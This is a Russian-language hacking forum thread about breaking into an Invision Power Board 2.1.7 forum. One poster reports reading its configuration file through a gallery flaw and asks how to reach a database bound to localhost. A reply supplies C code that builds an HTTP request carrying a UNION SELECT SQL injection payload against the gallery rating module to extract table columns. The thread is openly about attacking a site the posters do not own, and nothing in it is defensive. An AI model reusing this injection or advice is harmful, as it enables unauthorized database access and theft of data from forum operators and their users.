Всем доброго времени суток, прокоментируйте пожалуйста ситуацию: есть форум ipb 2.1.7, в его галлерее нашел уязвимость которая позволила мне прочитать conf_global.php загвоздка вот в чем: PHP: $INFO['sql_host'] = 'localhost'; как в этом случае приконнектиться к серверу? пропинговал сайт, узнал ип на котором он висит, попробовал присоединиться но ничего не получилось есть выход из данной ситуации?
C-r-A-c-K, есть еще скуль иньекция: Code: strcpy(exploit, "GET /"); strcat(exploit, path); strcat(exploit, "?automodule=gallery&cmd=rate&img=1&rating=1&album=-1%20union%20select%201,"); strcat(exploit, column); strcat(exploit, ",1,1,1,1,1,1,1,1%20FROM%20"); strcat(exploit, prefix); strcat(exploit, table); strcat(exploit, "%20WHERE%20id="); strcat(exploit, id); strcat(exploit, "/*31337*/"); strcat(exploit, " HTTP/1.0\r\nHost: "); strcat(exploit, host); strcat(exploit, "\r\n\r\n"); Exploit(exploit, "sqlinject", host); при правильно обращении меня кидает на форум и пишет что-то типа что у меня нет прав... при неправильном запросе выскакивает ошибка, показывает префикс и.т.д в правильном запросе запись могла попасть в sql_error_log с желаемым содержимым? sql_error_log вообще есть в 2.1.7? не смог найти